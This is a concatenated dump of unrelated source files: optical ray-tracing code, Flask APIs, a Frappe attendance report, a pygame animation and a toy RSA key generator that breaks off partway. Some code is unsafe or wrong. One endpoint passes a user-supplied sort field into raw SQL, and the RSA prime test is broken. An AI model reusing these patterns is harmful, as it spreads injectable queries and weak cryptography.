sum(self.surf_inr[1:self.no_surfs])\n ) / self.rindex_sgd_end\n r_a += r_y1 * self.rindex_sgd_prj / self.tel_focal_len\n r_w += (self.tel_prin_pos_obj - sum(self.surf_inr[1:self.no_surfs])\n ) / self.rindex_sgd_end / r_y0 / r_y1\n return r_y1, r_a, r_w\n\n def ray_tracing_pow(self, dist_infinity):\n \"\"\"\n パワーデータを用いて近軸光線追跡\n 対応するBASICコード:*RTT など\n \"\"\"\n r_y = 1 if dist_infinity else 0\n r_a = 0 if dist_infinity else 1\n for index in range(self.tel_no_pows if self.inr_adj ==\n IntervalAdjustment.TELEPHOTO_POWER_0 else\n self.no_pows):\n r_y -= r_a * self.pow_inr[index]\n r_a += r_y * self.pow_val[index]\n return r_y, r_a\n\n def is_air(self, surf_no):\n \"\"\"\n 光学系内のsurf_noで示される場所が\n 空気層のときにTrueを返す\n \"\"\"\n return (self.rindex[surf_no] == 1 or\n (surf_no not in range(self.no_surfs)))\n\n def iris_exists(self):\n \"\"\"\n 光学系に絞りがあるときにTrueを返す\n \"\"\"\n return (self.iris_pos != 0)\n\n\nclass DataConsistenceError(Exception):\n pass\n\n\nclass NoGlassDataError(Exception):\n pass\n\n\nclass IllegalCaseError(Exception):\n pass\n\n\ndef fn_fc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst, ptlc_s_lst, pv, divr,\n no_surfs, sign):\n \"\"\"\n 対応するBASICコード:*FC\n 引数覚書:\n ridf_lst→rindex diff list\n ri_lst→rindex list\n pv_lst→power value list\n pi_lst→power interval list\n 
ptlc_v_lst→power to lens curvature value list\n ptlc_s_lst→power to lens curvature specification list\n pv→power value\n divr→division ratio\n no_surf→number of surfaces\n sign→signature\n \"\"\"\n x0 = 0.05\n x1 = 0\n t_pv_lst, pv_lst, y0 = fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst,\n ptlc_s_lst, pv, divr, no_surfs, sign, 0)\n t_pv_lst, pv_lst, y1 = fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst,\n ptlc_s_lst, pv, divr, no_surfs, sign, x0)\n while True:\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n t_pv_lst, pv_lst, y1 = fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst,\n ptlc_v_lst, ptlc_s_lst, pv, divr,\n no_surfs, sign, x0)\n if abs(y1) < 0.0000005:\n break\n return t_pv_lst, pv_lst\n\n\ndef fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst, ptlc_s_lst, pv, divr,\n no_surfs, sign, delta):\n \"\"\"\n 対応するBASICコード:*PC\n 引数覚書:\n ridf_lst→rindex diff list\n ri_lst→rindex list\n pv_lst→power value list\n pi_lst→power interval list\n ptlc_v_lst→power to lens curvature value list\n ptlc_s_lst→power to lens curvature specification list\n pv→power value\n divr→division ratio\n no_surf→number of surfaces\n sign→signature\n delta→delta\n \"\"\"\n t_pv_lst = []\n r_pv_lst = []\n if ridf_lst[0] == 0:\n t_pv_lst.append(0)\n t_pv_lst.append(pv)\n else:\n t_pv_lst.append(fn_p(divr, pv, delta))\n t_pv_lst.append(fn_p(divr, pv, delta) * divr)\n if no_surfs == 4:\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[0], ridf_lst[0], ridf_lst[1], t_pv_lst[0],\n pi_lst[1], ptlc_v_lst[0], pv_lst[0], pv_lst[1])))\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[1], ridf_lst[2], ridf_lst[3], t_pv_lst[1],\n pi_lst[3], ptlc_v_lst[1], pv_lst[2], pv_lst[3])))\n r_q = (delta - pi_lst[1] * pv_lst[0] / t_pv_lst[0] -\n pi_lst[3] * pv_lst[3] / t_pv_lst[1] - pi_lst[2])\n elif abs(ri_lst[1]) == 1:\n r_pv_lst.append(pv_lst[0])\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[0], ridf_lst[1], ridf_lst[2], t_pv_lst[1],\n pi_lst[2], ptlc_v_lst[0], pv_lst[1], pv_lst[2])))\n r_pv_lst.append(pv_lst[3])\n r_q = delta - pi_lst[2] * pv_lst[2] / t_pv_lst[1] - pi_lst[1]\n elif abs(ri_lst[2]) == 1:\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[0], ridf_lst[0], ridf_lst[1], t_pv_lst[0],\n pi_lst[1], ptlc_v_lst[0], pv_lst[0], pv_lst[1])))\n r_pv_lst.append(pv_lst[2])\n r_pv_lst.append(pv_lst[3])\n r_q = delta - pi_lst[1] * pv_lst[0] / t_pv_lst[0] - pi_lst[0]\n else:\n r_pv_lst.append((t_pv_lst[0] - (sign - ri_lst[1]) * ptlc_v_lst[0]) /\n (1 - pi_lst[1] * (sign - ri_lst[1]) * ptlc_v_lst[0]))\n r_pv_lst.append(pv_lst[1])\n r_pv_lst.append((t_pv_lst[1] - (ri_lst[2] - sign) * ptlc_v_lst[0]) /\n (1 - pi_lst[2] * (ri_lst[2] - sign) * ptlc_v_lst[0]))\n r_pv_lst.append(pv_lst[3])\n r_q = (delta - pi_lst[1] * pv_lst[0] / t_pv_lst[0] -\n pi_lst[3] * pv_lst[3] / t_pv_lst[1] - pi_lst[2])\n return t_pv_lst, r_pv_lst, r_q\n\n\ndef fn_ps(ptlc_s, ridf0, ridf1, pv, pi, ptlc_v, r_pv0, r_pv1):\n \"\"\"\n 対応するBASICコード:sub PS\n 引数覚書:\n ptlc_s→power to lens curvature specification\n ridf→rindex diff\n pv→power value\n pi→power index\n ptlc_v→power to lens curvature value\n r_pv→return of power value\n \"\"\"\n if ptlc_s == PTLCSpecification.FRONT:\n return ridf0 * ptlc_v, (pv - r_pv0) / (1 - pi * r_pv0)\n elif ptlc_s == PTLCSpecification.BACK:\n return ridf1 * ptlc_v, (pv - r_pv1) / (1 - pi * r_pv1)\n elif ptlc_s == PTLCSpecification.FRONT_OVER_BACK:\n return fn_p(ptlc_v, pv, pi), fn_p(ptlc_v, pv, pi) * ptlc_v\n elif ptlc_s == PTLCSpecification.BACK_OVER_FRONT:\n return fn_p(ptlc_v, pv, pi) * ptlc_v, fn_p(ptlc_v, pv, pi)\n else:\n raise IllegalCaseError(\n 'Power 
to Lens Curvature Specification is set to ' + ptlc_s +\n ' in fn_ps.')\n\n\ndef fn_p(a_a, a_p, a_e):\n \"\"\"\n 二次方程式の解の公式の変形\n 対応するBASICコード:function fnP\n \"\"\"\n return 2 * a_p / (1 + a_a) / (\n 1 + math.sqrt(1 - 4 * a_p * a_e * a_a / (1 + a_a)**2))\n\n\ndef newton_step(*pos, factor=1):\n \"\"\"\n ニュートン法での計算の際に用いる\n 対応するBASICコード:*ND\n \"\"\"\n x = (pos[0] * pos[1] - pos[2] * pos[3]) / (pos[1] - pos[3])\n return (1 - factor) * pos[0] + factor * x, pos[3], pos[0], pos[3]\n\n\ndef rev(val):\n \"\"\"\n 逆数を計算する(1/0 = 0とする)\n \"\"\"\n if val == 0:\n return 0\n return 1 / val\n\n\ndef get_stringlist(config, category, item):\n \"\"\"\n configで指定されたデータファイルのitemで指定された項目が\n String型データのカンマ区切りで構成されているときに\n String型のリストとして読み込む\n \"\"\"\n if config.get(category, item, fallback='') == '':\n return []\n return [\n e.strip() for e in config.get(category, item, fallback='').split(',')\n ]\n\n\ndef get_floatlist(config, category, item):\n \"\"\"\n configで指定されたデータファイルのitemで指定された項目が\n Float型データのカンマ区切りで構成されているときに\n Float型のリストとして読み込む\n \"\"\"\n if config.get(category, item, fallback='') == '':\n return []\n return [\n float(e.strip())\n for e in config.get(category, item, fallback='').split(',')\n ]\n\n\ndef get_intlist(config, category, item):\n \"\"\"\n configで指定されたデータファイルのitemで指定された項目が\n Int型データのカンマ区切りで構成されているときに\n Int型のリストとして読み込む\n \"\"\"\n if config.get(category, item, fallback='') == '':\n return []\n return [\n int(e.strip())\n for e in config.get(category, item, fallback='').split(',')\n ]\n\n\ndef pad(lst, e, num):\n \"\"\"\n 指定されたリストを所定の長さまで所定の要素でパディングして返す\n \"\"\"\n return (lst + [e] * num)[:num]\n\n\ndef overwrite(lst0, lst1):\n \"\"\"\n lst0の各要素をlst1の各要素で上書きしたリストを返す\n \"\"\"\n return (lst1 + lst0[len(lst1):])[:len(lst0)]\n\n\ndef import_glass_data(config):\n \"\"\"\n configで指定されたデータファイルからガラスデータを読み込む\n 対応するBASICコード:*IN4\n \"\"\"\n global GLASS_DATA\n GLASS_DATA = {}\n data_index = ['dispersion', 'nd', 'nC', 'nF', 'density']\n for key, value in config['Glass Data'].items():\n pv = [float(e.strip()) for e in value.split(',')]\n GLASS_DATA[key.upper()] = dict(zip(data_index, pv))\n","repo_name":"hajimetch/OpticalSystemProgram","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":68695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22221917770","text":"from flask import Flask, redirect, url_for, request, render_template\nimport models.model_rule\n\napp = Flask(__name__) # WSGI应用程序\n\n# route装饰器,告诉flask什么样的URL才能触发我们的函数,返回我们想要显示在用户浏览器中的信息\n\n\n@app.route('/upload')\ndef upload_file():\n return render_template('upload.html')\n\n\n\"\"\"\n 定义规则模型处理函数\n 输入:\n dataset: 数据集文件存放位置\n cateValue: 标签\n deleteValue:需要删除的无关列\n lift_down_lmt:选取用于两两交叉的规则的提升度阈值\n badrate_down_lmt:坏账率阈值\n Rule_min_cnt:规则需命中的最小样本量\n lift_need:规则需要满足的提升度\n min_bad_add:规则集累加参数\n nan_ratio_threshold:剔除缺失值的阈值,默认为0.999\n mode_ratio_threshold:剔除单一值的阈值,默认为0.999\n nan_replace_num:NAN填充值,默认为-999\n train_size:训练集比例,默认为0.7\n max_leaf_num:分箱的最大箱数,默认值为6\n min_woe_box_percent:叶节点最小样本量比例(仅占非空值的),默认值为0.01\n min_woe_box_num_min:叶节点最小样本量;满足叶节点最小样本量比例,且满足叶节点最小样本量,默认值为50\n cor_max:相关性阈值,默认值为0.9\n\n 输出:dict\n rule_final_table: string 最终规则集csv文件地址\n rule_final_effe_table:string 规则集在测试集上的效果文件地址\n \"\"\"\n\n\n@app.route('/', methods=['POST'])\ndef rule_run():\n # 从前端获取数据\n data = request.get_json(silent=True)\n # 调用函数\n res = models.model_rule.model_rule('upload/datasets/creditcard.csv', 'Class', 'V11',\n 2.5, 0.2, 100, 3, 20)\n # 根据前端的需求,返回相应名称的参数\n return res\n\n# 
@app.route('/upload/file', methods=['POST', 'GET'])\n# def uploader():\n # if request.method == 'POST':\n # data = request.get_json(silent=True)\n # res = models.model_rule.model_rule('../upload/creditcard.csv', 'Time', 'V11',\n # 2.5, 0.2, 100, 3, 20, 0.999, 0.999, -999, 0.7, 6, 0.01, 50, 0.9)\n # file_path = data['files'] # 应该是个路径\n # modeltype = data['modeltype']\n\n # res = {\n # 'status': 0,\n # 'data': {\n # 'header': [\"Col1\", \"Col2\", \"Col3\"],\n # 'rows': [\n # {1, 2, 3},\n # {1, 2, 3}\n # ],\n # 'file': 'file_name',\n # },\n # 'msg': '提示信息'\n # }\n # f = request.files['file']\n # print(request.files)\n # f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename)))\n # return res\n # else:\n # return render_template('upload.html')\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"vispery/FlaskModelRunningAPI","sub_path":"data_analysis_util_api/control_rule.py","file_name":"control_rule.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6151814727","text":"import numpy as np\nimport os\nimport pdb\n\n# To be modified\n\ndatasets = os.listdir('./result')\n\nfor dataset in datasets:\n file = open('summary_{}.csv'.format(dataset),'w')\n\n result_dir = os.path.join('./result', dataset)\n\n entries = os.listdir(result_dir)\n entries.sort()\n\n for entry in entries:\n\n if 'run_' in entry:\n continue\n \n result_file = os.path.join(result_dir, entry)\n\n if entry.startswith('trpo'):\n entry_result = np.load(result_file).mean(0).mean(0).mean(0).mean(0)\n elif entry.startswith('tcn'):\n entry_result = np.load(result_file).mean(0).mean(0)\n\n line = str(entry)\n for i in range(len(entry_result)):\n line += ','\n line += str(entry_result[i])\n line += '\\n'\n\n file.write(line)","repo_name":"Finspire13/RL-Surgical-Gesture-Segmentation","sub_path":"export_csv.py","file_name":"export_csv.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"99"} +{"seq_id":"16859206469","text":"from .writer import Writer\nfrom collections import OrderedDict\n\nclass CodeMethod(object):\n def __init__(self, generator, name, interface, description, implementation, executor):\n self.generator = generator\n self.name = name\n self.interface = interface\n self.description = description\n self.implementation = implementation\n self.executor = executor\n self.arguments = OrderedDict()\n \n def __str__(self):\n with Writer() as w:\n if self.interface:\n w.write('@interfacemethod(%s)' % repr(self.interface))\n w.put('def %s(self' % self.name)\n if self.arguments:\n for a in self.arguments.itervalues():\n w.put(', %s' % a.signature)\n w.put('):\\n')\n w.i()\n if self.description or self.arguments:\n w.write('\"\"\"')\n if self.description:\n self.write(self.description.strip())\n if self.arguments:\n if self.description:\n self.write()\n for n, a in self.arguments.iteritems():\n w.write(a.docstring)\n w.write('\"\"\"')\n w.put_indent()\n if self.implementation:\n if self.executor:\n w.put('self.context.executor(%s).' 
% repr(self.executor))\n else:\n w.put('self.context.executor().')\n if '/' in self.implementation:\n w.put('selc.context.executor().execute(self, %s' % repr(self.implementation))\n else:\n w.put('%s(self' % self.implementation)\n if self.arguments:\n for n in self.arguments:\n w.put(', %s' % n)\n w.put(')')\n else:\n w.put('pass')\n return str(w)\n","repo_name":"jcollado/aria-ng","sub_path":"src/generator/aria_generator/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18482949579","text":"from math import ceil\nfrom flask import Blueprint, jsonify, request, g\nfrom sqlalchemy import text\nfrom sqlalchemy.sql import or_\nfrom pospax import db\nfrom app.models import Category\nfrom app.schema import CategorySchema\n\ncategory_api = Blueprint('category_api', __name__, url_prefix='/api/category')\ncategorySchema = CategorySchema(many=True)\n\n\n@category_api.before_request\ndef before_request():\n\tg.sid = 1\n\tg.bid = 1\n\n\n@category_api.route('/list')\ndef category_list():\n\tcategories = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, is_active='Y').all()\n\treturn jsonify({\n\t\t'categories': categorySchema.dump(categories).data\n\t})\n\n\n@category_api.route('/get', defaults={'id': ''})\n@category_api.route('/get/')\ndef category_get(id):\n\tcategory = Category(site_id=g.sid, branch_id=g.bid)\n\tif id:\n\t\tcategory = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, is_active='Y', id=id).first()\n\tschema = CategorySchema()\n\treturn jsonify({\n\t\t'category': schema.dump(category).data\n\t})\n\n\n@category_api.route('/delete/')\ndef category_delete(id):\n\tresult = 0\n\tcategory = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, id=id).first()\n\tif category:\n\t\tresult = category.id\n\t\tif category.is_active == 'N':\n\t\t\tdb.session.delete(category)\n\t\telse:\n\t\t\tcategory.is_active = 'N'\n\t\t\tdb.session.merge(category)\n\t\tdb.session.commit()\n\treturn jsonify({ 'result': result })\n\n\n@category_api.route('/save', methods=['POST'])\ndef category_save():\n\tresult = 0\n\tf = request.get_json()\n\tif f is None:\n\t\tf = request.form\n\n\tforms = {\n\t\t'site_id': g.sid,\n\t\t'branch_id': g.bid,\n\t\t'name': f.get('name') or '',\n\t\t'description': f.get('description') or ''\n\t}\n\n\tid = f.get('id') or None\n\tif id:\n\t\tcategory = Category.query.get(id)\n\t\tfor k, v in forms.iteritems():\n\t\t\tsetattr(category, k, v)\n\t\tdb.session.merge(category)\n\telse:\n\t\tcategory = Category()\n\t\tfor k, v in forms.iteritems():\n\t\t\tsetattr(category, k, v)\n\t\tdb.session.add(category)\n\tdb.session.commit()\n\n\tif category: result = category.id\n\treturn jsonify({ 'result': result })\n\n\n@category_api.route('/search', methods=['POST'])\ndef category_search():\n\tf = request.get_json()\n\tif f is None:\n\t\tf = request.form\n\tpage = f.get('page') or 1\n\trp = f.get('rp') or 10\n\tterm = f.get('term') or ''\n\tsort = f.get('sort') or None\n\tdesc = f.get('desc') or False\n\tactive = f.get('is_active') or 'Y'\n\n\tquery = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, is_active=active)\n\tif term:\n\t\tquery = query.filter(or_(\n\t\t\tCategory.name.ilike('%' + term + '%'),\n\t\t\tCategory.description.ilike('%' + term + '%'),\n\t\t))\n\n\tif sort:\n\t\tquery = query.order_by(text(sort + ' ' + ('desc' if desc else 'asc')))\n\n\ttotal = query.count()\n\ttotal_pages = int(ceil(float(total) / rp))\n\tresults = 
page * rp\n\tpage_count = results if results <= total else total\n\n\tcategories = query.limit(rp).offset((page - 1) * rp)\n\treturn jsonify({\n\t\t'total': total,\n\t\t'total_pages': total_pages,\n\t\t'page_count': page_count,\n\t\t'categories': categorySchema.dump(categories).data\n\t})\n","repo_name":"ekkazit/bartender","sub_path":"app/apis/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74225229124","text":"import frappe\nfrom frappe import _\n\n\ndef execute(filters=None):\n\tif not filters:\n\t\tfilters = {}\n\tcolumns, data = [], []\n\t# att = frappe.db.sql(\"\"\"SELECT name,designation \n\t# \t FROM `tabAttendance` \n\t# \t WHERE docstatus = 1 \n\t# \t AND status = 'Present' \n\t# \t and designation is not null \"\"\",as_dict=1)\n\t# for attendance in att:\n\t# \tres_time = frappe.db.get_value(\"Designation\",attendance.designation,\"rest_time\")\n\t# \tif res_time:\n\t# \t\tfrappe.db.update(\"Attendance\",attendance.name,\"rest_time\",res_time)\n\t# \telse:\n\t# \t\tfrappe.db.update(\"Attendance\",attendance.name,\"rest_time\",0)\n\n\n\tconditions = get_conditions(filters)\n\tcolumns = get_columns()\n\tdata = get_results(filters,conditions)\n\n\treturn columns, data\n\n\ndef get_conditions(filters):\n\tconds = \"\"\n\tconds += \" AND company = %(company)s \" if filters.get(\"company\") else \"\"\n\tconds += \" AND attendance_date = %(attendance_date)s \" if filters.get(\"attendance_date\") else \"\"\n\tconds += \" AND designation = %(designation)s \" if filters.get(\"designation\") else \"\"\n\tconds += \" AND department = %(department)s \" if filters.get(\"department\") else \"\"\n\tconds += \" AND employee_group\t = %(employee_group)s \" if filters.get(\"employee_group\") else \"\"\n\treturn conds\n\ndef get_columns():\n\treturn [ _(\"Employee Name\") + \"::190\", _(\"ID. 
No.\") + \"::150\",_(\"Shift\") + \"::150\",_(\"Place of Work\") + \"::150\",_(\"Time In\") + \"::150\",_(\"Time Out\") + \"::150\",_(\"Overtime\") + \"::150\"]\n\t\n\ndef get_results(filters,conditions):\n\n\t# query = \"\"\"\n\t# \t\tSELECT \n\t# \t\t\temployee_name, \n\t# \t\t\tid_number, \n\t# \t\t\tshift, \n\t# \t\t\tplace_of_work,\n\t# \t\t\tSUBSTRING(time(in_time), 1, 5) AS in_time, \n\t# \t\t\tSUBSTRING(time(out_time), 1, 5) AS out_time,\n\t# \t\t\tCASE \n\t# \t\t\t\tWHEN ADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00') < '00:00:00' THEN '0'\n\t# \t\t\t\tELSE \n\t# \t\t\t\t\tFORMAT(\n\t# \t\t\t\t\t\tFLOOR(\n\t# \t\t\t\t\t\t\tTIME_TO_SEC(\n\t# \t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t# \t\t\t\t\t\t\t) / 3600\n\t# \t\t\t\t\t\t) + \n\t# \t\t\t\t\t\tFLOOR(\n\t# \t\t\t\t\t\t\tMOD(\n\t# \t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t# \t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t# \t\t\t\t\t\t\t\t),\n\t# \t\t\t\t\t\t\t\t3600\n\t# \t\t\t\t\t\t\t) / 1800\n\t# \t\t\t\t\t\t) * 0.5 +\n\t# \t\t\t\t\t\tFLOOR(\n\t# \t\t\t\t\t\t\tMOD(\n\t# \t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t# \t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t# \t\t\t\t\t\t\t\t),\n\t# \t\t\t\t\t\t\t\t1800\n\t# \t\t\t\t\t\t\t) / 900\n\t# \t\t\t\t\t\t) * 0.25,\n\t# \t\t\t\t\t\t2\n\t# \t\t\t\t\t)\n\t# \t\t\tEND AS overtime\n\t# \t\tFROM `tabAttendance`\n\t# \t\tWHERE docstatus = 1 {0}\n\t# \"\"\".format(conditions,filters)\n\n\tquery = \"\"\"\n\t\t\tSELECT \n\t\t\t\temployee_name, \n\t\t\t\tid_number, \n\t\t\t\tshift, \n\t\t\t\tplace_of_work,\n\t\t\t\tSUBSTRING(time(in_time), 1, 5) AS in_time, \n\t\t\t\tSUBSTRING(time(out_time), 1, 5) AS out_time,\n\t\t\t\tCASE \n\t\t\t\t\tWHEN ADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00') < '00:00:00' THEN '0'\n\t\t\t\t\tELSE \n\t\t\t\t\t\tFORMAT(\n\t\t\t\t\t\t\tFLOOR(\n\t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t\t\t\t\t\t\t\t) / 3600\n\t\t\t\t\t\t\t) + \n\t\t\t\t\t\t\tFLOOR(\n\t\t\t\t\t\t\t\tMOD(\n\t\t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t\t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t3600\n\t\t\t\t\t\t\t\t) / 1800\n\t\t\t\t\t\t\t) * 0.5 +\n\t\t\t\t\t\t\tFLOOR(\n\t\t\t\t\t\t\t\tMOD(\n\t\t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t\t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t1800\n\t\t\t\t\t\t\t\t) / 900\n\t\t\t\t\t\t\t) * 0.25\n\t\t\t\t\t\t\t- rest_time,\n\t\t\t\t\t\t\t2\n\t\t\t\t\t\t)\n\t\t\t\tEND AS overtime\n\t\t\tFROM `tabAttendance`\n\t\t\tWHERE docstatus = 1 {0}\n\t\"\"\".format(conditions,filters)\n\tdata = []\n\tresults = frappe.db.sql(query, filters)\n\ttotal_ot = 0.00\n\tfor row in results:\n\t\ttotal_ot += float(row[-1])\n\t\tdata.append(row)\n\trow_end = ['Total','','','','','',total_ot]\n\tdata.append(row_end)\n\treturn data\n","repo_name":"maveeshah/Danisa","sub_path":"danisa/danisa/report/daily_attendance_sheet_with_overtime/daily_attendance_sheet_with_overtime.py","file_name":"daily_attendance_sheet_with_overtime.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26307702344","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nfrom unittest import TestCase\n\nfrom floor.controller.playlist import Playlist, PlaylistItem, ProcessorNotFound\nfrom floor.processor import all_processors\n\nBASE_DIR = 
os.path.dirname(os.path.realpath(__file__))\nDEFAULT_PLAYLIST = BASE_DIR + \"/../../config/playlists/default.json\"\n\n\nclass PlaylistTest(TestCase):\n def setUp(self):\n self.all_procs = all_processors()\n\n def test_default_playlist(self):\n p = Playlist.from_file(DEFAULT_PLAYLIST, self.all_procs, strict=True)\n self.assert_(len(p.queue) > 0, \"Expected non-zero default playlist.\")\n\n def test_playlist_item_from_and_to_object(self):\n item = PlaylistItem.from_object(\n {\n \"name\": \"Animator\",\n },\n self.all_procs,\n )\n\n item_object = item.to_object()\n self.assertEqual(\n {\n \"name\": \"Animator\",\n \"title\": \"Animator\",\n \"args\": {},\n \"duration\": None,\n },\n item_object,\n )\n\n item = PlaylistItem.from_object(\n {\n \"name\": \"Animator\",\n \"title\": \"My Other Animator\",\n \"args\": {\"foo\": \"bar\"},\n \"duration\": 123,\n },\n self.all_procs,\n )\n\n item_object = item.to_object()\n self.assertEqual(\n {\n \"name\": \"Animator\",\n \"title\": \"My Other Animator\",\n \"args\": {\"foo\": \"bar\"},\n \"duration\": 123,\n },\n item_object,\n )\n\n def test_playlist_item_invalid_processor_name(self):\n with self.assertRaises(ProcessorNotFound):\n PlaylistItem.from_object(\n {\n \"name\": \"ZoopZap\",\n },\n self.all_procs,\n )\n","repo_name":"tennessee-garage/dance-floor","sub_path":"floor/floor/controller/playlist_test.py","file_name":"playlist_test.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"33904751926","text":"import pygame\nfrom pygame.locals import *\n\nSCREEN_WIDTH = 500\nSCREEN_HEIGHT = 500\nBG = (50,50,50)\nBLACK = (0,0,0)\n\nclass SpriteSheet():\n def __init__(self,image):\n self.sheet = image\n\n def get_image(self, width, height, scale, frame):\n image = pygame.Surface((width, height)).convert_alpha()\n image.blit(self.sheet, (0, 0), ((frame * width), 0, width, height))\n image = pygame.transform.scale(image, (width * scale, height * scale))\n image.set_colorkey(BLACK)\n return image\n\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\npygame.display.set_caption('анимация')\n\nsprite_sheet_image = pygame.image.load('dino.png')\nsprite_sheet = SpriteSheet(sprite_sheet_image)\n\nanimation_list = []\nanimation_steps = [4,6,3,4,7]\n\nstep_counter = 0\nfor animation in animation_steps:\n temp_img_list = []\n for i in range(animation):\n k = sprite_sheet.get_image(24,24,3,step_counter)\n temp_img_list.append(k)\n step_counter +=1\n animation_list.append(temp_img_list)\n\nlast_update = pygame.time.get_ticks()\nanimation_cooldown = 500\nframe = 0\naction = 0\nrunning = True\n\nwhile running:\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n if event.type == KEYDOWN:\n if event.key == K_DOWN and action > 0:\n action -=1\n frame = 0\n\n if event.key == K_UP and action < len(animation_list)-1:\n action += 1\n frame = 0\n\n if event.key == K_1:\n action = 0\n frame = 0\n if event.key == K_2:\n action = 1\n frame = 0\n if event.key == K_3:\n action = 2\n frame = 0\n if event.key == K_4:\n action = 3\n frame = 0\n if event.key == K_5:\n action = 4\n frame = 0\n\n\n\n screen.fill(BG)\n\n screen.blit(animation_list[action][frame],(0,0))\n\n current_time = pygame.time.get_ticks()\n if current_time-last_update >= animation_cooldown:\n frame += 1\n if frame >= len(animation_list[action]):\n frame = 0\n\n last_update = current_time\n\n\n\n 
pygame.display.update()\n\npygame.quit()\n","repo_name":"blackcoster/Games2Lessons","sub_path":"Lesson42/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19082685074","text":"# Key generation\n\ndef isPrime(num):\n\tfor i in range(2,num):\n\t\tif (num % i) == 0:\n\t\t\tprime = False\n\t\telse:\n\t\t\tprime = True\n\treturn prime\n\ndef find_nearest_prime(num):\n\twhile num < 100000:\n\t\tif isPrime(num):\n\t\t\treturn num\n\t\telse:\n\t\t\tnum += 1\n\n# let's split the coprime function into smaller functions to simply get factors\n\ndef get_factors(num):\n\tfactors = []\n\tfor i in range(2,num):\n\t\tif ((num % i) == 0):\n\t\t\tfactors.append(i)\n\treturn factors\n\n# this function tests whether two numbers are coprime - i.e. if they have any common factors other than one and themselves.\n# seems to be working now, having separately defined the get_factors function\n\ndef isCoprime(num1,num2):\n\tnum1_factors = get_factors(num1)\n\tnum2_factors = get_factors(num2)\n\tif set(num1_factors).isdisjoint(set(num2_factors)):\n\t\t# print('no common factors - they coprime!')\n\t\treturn True\n\telse:\n\t\t# print('there are common factors, not coprime')\n\t\treturn False\n\n# check through candidate numbers that satisfy the conditions for the private key e. \n\ndef find_e(n,phi_n):\n\tcandidates = []\n\tfor i in range(3,n):\n\t\tif isPrime(i):\n\t\t\tif((isCoprime(i,n)) and (isCoprime(i,phi_n))):\n\t\t\t\tcandidates.append(i)\n\treturn candidates\n\n# find d (the private key part 1)\ndef find_d(prime1,n):\n\tfor i in range(prime1,n):\n\t\tif (((i*e) % phi_n) == 1):\n\t\t\tprint(i)\n\t\t\treturn i\n\n# pick two large prime numbers:\n\n# ==== first prime number\n\nprint(\"let's generate the first of two prime numbers.\")\n\nuser_entropy = input(\"please generate some entropy by typing lots of random characters: \")\nentropy = 0\nfor letter in user_entropy:\n\tentropy = entropy + ord(letter)\n\nprint(entropy)\n\n# use entropy value to select a prime number\n\nprime1 = find_nearest_prime(entropy)\nprint(\"the first prime number is: %s\" % prime1)\n\n# ===== second prime number\n\nprint(\"let's generate the second of two prime numbers.\")\n\nuser_entropy = input(\"please generate some entropy by typing lots of random characters: \")\nentropy = 0\nfor letter in user_entropy:\n\tentropy = entropy + ord(letter)\n\nprint(entropy)\n\n# use entropy value to select a prime number\n\nprime2 = find_nearest_prime(entropy)\nprint(\"the second prime number is: %s\" % prime2)\n\n\n# ==== generate N (second part of public and private keypairs)\n\nn = prime1*prime2\n\nprint(\"N 